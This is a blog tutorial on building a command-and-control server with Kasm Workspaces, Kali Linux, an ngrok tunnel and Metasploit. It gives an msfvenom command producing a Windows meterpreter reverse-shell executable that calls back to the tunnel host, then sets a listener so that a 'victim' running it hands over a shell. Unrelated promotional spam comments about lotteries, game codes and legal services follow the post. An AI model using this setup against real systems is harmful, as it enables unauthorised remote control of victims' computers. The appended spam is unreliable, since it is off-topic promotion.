Setting up a C&C Server with Metasploit and Kasm Workspaces
- Teja Swaroop
- Jan 30, 2024
- 3 min read
In this article, I will walk you through setting up your Command and Control Server using Metasploit and Kasm Workspaces.
Metasploit is a penetration testing framework that contains a payload generator, many modules to enumerate and exploit different known vulnerabilities on different targets. It can also be used as a Command and Control (C&C) server by managing target sessions, maintain persistence, perform post exploitation, etc., It is a must-have tool in any hacker's toolkit.
Kasm is a docker container streaming platform which enables you to run private sessions of docker apps and use them directly from your web browser. It supports many awesome features like session casting, ability to destroy/pause/resume sessions and so on. You can keep your docker apps organized and at one place to be readily usable with the help of Kasm.
We will first setup a Kali Linux hacking lab in Kasm workspaces and then use the pre-installed Metasploit framework from the Kali Linux container.
Install Kasm
Kasm can be installed on any Linux machine with at least 2 CPU cores, 4 GB memory and 50GB SSD storage. I like to install Kasm on a cloud instance because I want my C&C server to be always available and online. However, you can install Kasm on your local Linux machine as well. The official installation guide for Kasm is here: https://kasmweb.com/docs/latest/index.html
Just run these five simple commands to install Kasm:
# Go to /tmp
cd /tmp
# Download Kasm
curl -O https://kasm-static-content.s3.amazonaws.com/kasm_release_1.14.0.3a7abb.tar.gz
# Extract
tar -xf kasm_release_1.14.0.3a7abb.tar.gz
# Install Kasm
sudo bash kasm_release/install.shGreat! Now that you have Kasm installed, you can login to your dashboard by going to https://<YOUR_IP>
You can login with the default credentials that were displayed on the terminal when Kasm is done installing.
Install Kali Linux
Kali Linux is a Linux distribution designed for digital forensics and penetration testing. It comes with Metasploit pre-installed.
From your dashboard, go to Workspaces -> Add from Registry and install Kali Linux from the list of available docker images.
Once Kali is installed, go back to Workspaces and open a new session.
That's it! You now have a Kali Linux session.
Setup tunneling
Since you are using Kali Linux as a docker container - you will not be able to receive inbound connections from the internet. However, it is very important for your C&C server to be available on the Internet to receive connections from the targets. To fix this, you can use ngrok to create a secure tunnel from the Internet to your local network interface.
Go to ngrok.com, create an account and download ngrok
On the download page, you will also find the command to activate your ngrok tool with your unique auth token - simply copy and paste it on your terminal to authenticate.
Now, use the following command to setup a tunnel:
./ngrok tcp 1560This will create a tunnel from the ngrok servers (which are accessible from the Internet) to your localhost on port 1560. Feel free to use whatever port you like.
This will generate an ngrok address (6.tcp.ngrok.io) in my case and a unique port (17800) in my case.
You can use this address and port whenever you are creating a payload. For example, let me create a payload with msfvenom for a windows target with the command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=6.tcp.ngrok.io LPORT=17800 -f exe > payload.exeNotice how I used my ngrok address for the LHOST and my unique ngrok port for the LPORT. When a connection is received on this address and port, ngrok forwards it to my localhost on port 1560.
Now, to setup the listener - I will just open my Metasploit console with the msfconsole command and use exploit/multi/handler - then set the payload to the same (windows/x64/meterpreter/reverse_tcp)
I will then set the LHOST to localhost and LPORT to 1560 because this is where the connections from the Internet will be forwarded to by ngrok.
That's it! I will now simply type run and my listener is online. Now, whenever the victim executes the payload, I get a reverse shell on my msfconsole!
And just like that we are able to setup a C&C server on the cloud with the help of Kasm Workspaces and Metasploit!
Our Trust Act registration was completed effortlessly with the help of NGO Experts. Their legal team guided us through documentation, verification, and filing with complete transparency. We appreciated their quick response and attention to detail. Thanks to NGO Experts, our trust is now legally registered and fully compliant. Great service!
When I first heard about Raja Game Gift Code, I thought it was a rumor. But after trying it, I realized how amazing it is. These codes give you access to rewards instantly, saving time and effort. It’s one of the best things about the game because it keeps players motivated. I always look forward to new codes now.
Guna ka Aaj ka mausam is truly wonderful. The skies are bright, and the air feels light. Residents love this kind of climate, which makes everything feel stress-free.
Hanuman chalisa kannada has been a blessing for my spiritual routine. The Hanuman Chalisa Kannada Lyrics are written beautifully, making it easy to chant and understand. Chanting them has filled me with positive energy and strength to face challenges. My family also prefers this version, and together we chant daily. Lord Hanuman’s blessings feel more personal when I recite in Kannada. I also feel proud that my children are learning devotion in their mother tongue. This Kannada Chalisa has helped me grow spiritually and stay connected to both faith and culture. I highly recommend it to all Kannada-speaking devotees.
The TC Lottery App is a must-have for anyone who enjoys playing the lottery from their phone. With features like ticket scanning, instant notifications, and draw schedules, it keeps everything organized and accessible. The app is lightweight, runs smoothly, and brings a full lottery experience to your pocket. It's ideal for users who want flexibility and real-time access without visiting a physical retailer.